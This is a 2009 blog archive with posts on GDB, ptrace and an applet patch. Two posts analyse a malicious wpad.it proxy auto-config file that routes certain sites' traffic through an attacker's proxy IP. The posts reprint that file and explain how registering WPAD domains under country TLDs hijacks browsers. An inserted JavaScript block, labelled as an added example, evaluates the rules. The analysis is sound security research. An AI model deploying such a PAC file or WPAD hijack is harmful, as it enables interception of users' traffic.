Archive for May, 2009
The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II
Posted by Luca Invernizzi in Security on May 14, 2009
After reading Jacopo’s article on WPAD, I’ve tried to understand the Italian global wpad.it/wpad.dat:
function FindProxyForURL(url, host) {
    //regular expression/complexity supported?
    if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) ||
         (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) {
        return "PROXY 72.55.164.182:80; DIRECT";
    }
    return "DIRECT";
}
The proxy
The first thing that concerned me is that the IP address used as the proxy is Polish:
$ host 72.55.164.182
182.164.55.72.in-addr.arpa domain name pointer wpad.pl
It’s registered to a guy in Wloclawek, and it’s been up since December 2008, so it’s pretty new. The hosted site is syndicated, which is usually a fishy sign.
The syntax
The script provides a fallback policy to a direct connection, to avoid server overload, as described on Wikipedia:
return "PROXY 72.55.164.182:80; DIRECT"
The regular expression
I’ve downloaded the Alexa top 1-million sites list, which is updated daily, and I discovered that the second regular expression,
"http*//*s*st*mp*tn*sk*p*"
gets one and only one match: a Polish internet trading site.
$ cat top-1m.csv | sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p"
154967,systempartnerski.pl
The first regular expression, even without its initial and final parts, does not match any site in the Alexa top million.
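As an added example (not code from the original posts, nor from the wpad.it file's author), here is a small JavaScript evaluator that implements shExpMatch() with PAC glob semantics and runs the wpad.it rules quoted above (the same file is discussed in Part I below) against constructed URLs and an Alexa-style sample list, so the effect of the second pattern's exclusion clause can be checked. The URLs, hostnames and ranks other than the systempartnerski.pl row are constructed samples.

```javascript
// Added example (not code from the original posts): a minimal PAC evaluator.
// shExpMatch() follows the PAC glob semantics browsers use: '*' matches any
// run of characters, '?' matches exactly one, and the whole string must match.
function shExpMatch(str, pattern) {
  const re = pattern
    .replace(/[.+^${}()|[\]\\]/g, "\\$&") // escape regex metacharacters
    .replace(/\*/g, ".*")                  // glob '*' -> regex '.*'
    .replace(/\?/g, ".");                  // glob '?' -> regex '.'
  return new RegExp("^" + re + "$").test(str);
}

// The rule set exactly as found in the wpad.it file quoted above.
function FindProxyForURL(url, host) {
  if (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js") ||
      (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") &&
       !shExpMatch(url, "http*//*n*o.*"))) {
    return "PROXY 72.55.164.182:80; DIRECT";
  }
  return "DIRECT";
}

// Constructed sample rows in Alexa top-1m.csv format (rank,host); only the
// systempartnerski.pl row is taken from the post, the others are made up.
const SAMPLE_CSV = [
  "1,example.com",
  "154967,systempartnerski.pl",
  "200000,example.net",
].join("\n");

// Equivalent of the sed scan in the post: which hosts would a pattern hit
// when requested over plain HTTP? Returns the matching hostnames.
function hostsMatching(csv, pattern) {
  return csv.split("\n")
    .map(line => line.split(",")[1])
    .filter(h => shExpMatch("http://" + h + "/", pattern));
}

// Walk a few constructed URLs through the rules so the effect of the
// exclusion clause (http*//*n*o.*) is visible.
function decisions() {
  const urls = [
    "http://www.systempartnerski.pl/login",     // second pattern hits -> PROXY
    "http://www.systempartnerski.pl/info.html", // "n ... o." excluded -> DIRECT
    "http://www.example.com/",                  // matches nothing -> DIRECT
  ];
  return urls.map(u => [u, FindProxyForURL(u, new URL(u).hostname)]);
}

console.log(decisions());
console.log(hostsMatching(SAMPLE_CSV, "http*//*s*st*mp*tn*sk*p*")); // [ 'systempartnerski.pl' ]
console.log(hostsMatching(SAMPLE_CSV, "http://*g*ad*nd*c*m*sh*ds*js")); // []
```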
The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I
Posted by Jacopo Corbetta in Security on May 13, 2009
The network here at Sant’Anna School of Advanced Studies is quite complicated, so sometimes the only way to solve a connectivity problem is to open Wireshark and start looking around. As you may know, Windows boxes are quite chatty and they love to send out NetBIOS broadcast packets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed something strange in the broadcast jam: a PC was continuously trying to reach the nonexistent WPAD.SSSUP.IT machine.
I got curious, looked up what WPAD is, and found a couple of interesting things.
What the heck is this WPAD thing?
It turns out Internet Explorer developers thought an organization might wish to set up elaborate rules for www proxying. Therefore, they devised a way for network admins to autoconfigure IE proxy settings: the Web Proxy Automatic Discovery Protocol (WPAD). All major browsers currently support this feature. Note that many applications on Windows default to following IE proxy settings, so the Man-In-The-Middle potential is very high.
Basically, the browser issues a request for http://wpad.yourdomain.com/wpad.dat [1], which should contain a JavaScript-like function called FindProxyForURL. The function can use wildcard matching to specify different proxies for different addresses. All the gory details are available at www.findproxyforurl.com.
Exploiting WPAD
Things can get complicated if you have a subdomain (e.g. if your computer is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if someone hijacks one of your wpad names, sophisticated Man-In-The-Middle attacks are possible. Since network admins often forget to set up a wpad host for their domain, Windows may try to query in multiple ways — even by broadcasting a NetBIOS request, which is trivial to intercept on a local network. [2]
Now, auto-configuration of network parameters is very useful. Tools like DHCP and transparent proxies are in wide use. However, this kind of auto-configuration brings risks: rogue DHCP servers can be transparent to users and possibly avoid detection. DHCP is a very well known protocol and network admins have long learnt to watch out for suspicious DHCP activity. WPAD is — in comparison — a somewhat obscure protocol. Buggy programs (and lax policies by domain registrars) create a sneaky exploit opportunity.
The DNS beast
As you might have guessed, Windows should stop short of the top-level domain .com in its quest for a wpad.dat. However, two issues come into play:
- On certain buggy versions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let’s hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level-Domains (TLDs) like wpad.cz or wpad.it?
- Some countries (like Italy) allow you to register domain names right under their national suffix (e.g. our beloved School has sssup.it). Other countries (the United Kingdom, for instance) chose to mimic the global TLD structure, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.
Combine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which is the TLD and which is the specific domain name. It is not immediately obvious, for instance, that pi.it is a global TLD (reserved for the Italian province of Pisa) while sns.it is the site of our arch-rival, the infamous Scuola Normale Superiore.
There is no “good” solution to this problem. Mozilla developers ended up creating a list of “Effective TLDs” [3] which the browser treats like global TLDs.
Each item on this list is an exploit opportunity for the WPAD bug. Just register the wpad.it domain and you potentially have control of all buggy machines with a .it name.
Attack on Italy: the wpad.it mystery
You might think registrars would think twice before assigning a “wpad.country” domain. It turns out that sometimes this is not the case.
Some global wpad domains do exist and many of them serve a malicious wpad.dat. I’m gathering data and I’ll post when I have enough to make an interesting summary.
But take a look at this, the global wpad.it/wpad.dat:
function FindProxyForURL(url, host) {
    //regular expression/complexity supported?
    if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) ||
         (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) {
        return "PROXY 72.55.164.182:80; DIRECT";
    }
    return "DIRECT";
}
What the hell is this? It appears the attacker is targeting some specific websites, but the wildcard is quite complicated. Any idea of what it might be?
UPDATE: found this same file on wpad.cz, full analysis in progress.
UPDATE: a more in-depth analysis here and here
- [1] Windows can also read its settings from DHCP and even from a special DNS entry. The official Microsoft documentation is somewhat sparse, but detailed information can be found in the draft submitted for standardization (previous version), in TechNet, in some knowledge base articles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a different format.
- [2] Even when a WINS server is present, naming your computer WPAD.YOURDOMAIN.COM might do the trick.
- [3] Browsers need this list to enforce cookie restrictions (what if someone was able to set a cookie on all “.co.uk” domains?). The list is now publicly maintained at publicsuffix.org.
Three GDB tricks for the masses
Posted by Alessandro Pignotti in Coding tricks on May 8, 2009
The GNU Debugger is a very powerful and fearsome beast. It seems that I’ve found a couple of useful tricks which are not as popular as they should be.
- The watch command: any script kiddie knows about breakpoints. Watchpoints are based on the same concept, applied not to code but to data memory. You can set a watchpoint on a variable using the following syntax:
    watch var
  It is also possible to watch a specific memory address with the syntax:
    watch *0xdeadbeaf
  A watchpoint triggers when the contents of the memory location change, so watchpoints are useful when trying to find out when a variable is modified (remember that in C++ you should always use private and protected sections to stop variables from being accessed or modified outside the expected code flow). It is also possible to set read watchpoints using the rwatch command, which triggers when the location is accessed. This feature is mainly useful when reverse engineering compiled code, to find out which code paths make use of, or are influenced by, a certain variable or memory location. The major drawback of watchpoints is that common hardware supports only a few of them. When gdb runs out of hardware watchpoints it resorts to software emulation, which is very slow, and not possible at all for read watchpoints. This also means that putting watchpoints on big structures and classes is highly discouraged.
- set print object: If you’ve ever made extensive use of polymorphic classes or otherwise complex class hierarchies, you will find this setting very useful. The print command, when printing pointers to base classes, will look at the virtual table to find out the actual object type, and print it beside the address. Moreover, when dereferencing pointers it will print the full object contents, not only the base class members.
- The info threads command: When you face a deadlock in your multithreaded code, the first step to understanding the problem is to find out which threads are blocked. The deadlock is often not easily reproducible, so you should first attach gdb to the running process using the attach <pid> command; then, typing info threads, you will get for each thread the function name where it is currently stopped. Threads involved in a deadlock condition are usually stopped in sem_wait or similar semaphore-related functions.
Well... I guess I’m using gdb way too much, maybe I’m not a good programmer.
Picking windows
Posted by Luca Invernizzi in Ubuntu on May 4, 2009
The Window Picker Applet is a GNOME applet (developed at Canonical) that displays the list of running applications and allows you to switch between them. It’s a default applet in Ubuntu-netbook-remix, since on netbooks screen real estate is essential.
It’s a nice little applet, but unfortunately does not work well with vertical panels, since it tries to display the icon list of the running applications horizontally (see this bug). I’ve developed a patch to window-picker-applet-0.4.22 that solves this issue.
To use it, do as follows:
apt-get source window-picker-applet
cd window-picker-applet-0.4.22
patch -p1 < $PATH_TO_THE_PATCH_FILE
and then the usual:
./configure
cd src && make && sudo make install
killall gnome-panel
Note that this patch *needs* gnome-panel to be restarted, since the panel orientation is chosen at initialization (I have not yet implemented changing the orientation while the applet is running).
Download the patch from here.
Fun with ptrace: system emulation
Posted by Alessandro Pignotti in Coding tricks on May 4, 2009
The more I explore the interfaces deeply hidden in the Linux kernel, the more a new world of opportunity opens. Today, while taking a look at the ptrace API, I found out about the PTRACE_SYSEMU option.
But what is ptrace? It’s a kernel interface to inspect and manipulate the information that crosses the user space/kernel space frontier. Its main... principal... only user is usually gdb. The PTRACE_SYSEMU option is quite peculiar: it was implemented mainly for the User Mode Linux project. It allows one not only to monitor the system calls invoked by a process, but also to replace the system call semantics.
So... how could this be useful? For example, to experiment with different auditing/sandboxing strategies, or to build compatibility layers at the system call level... but who knows what kind of funny things could be done!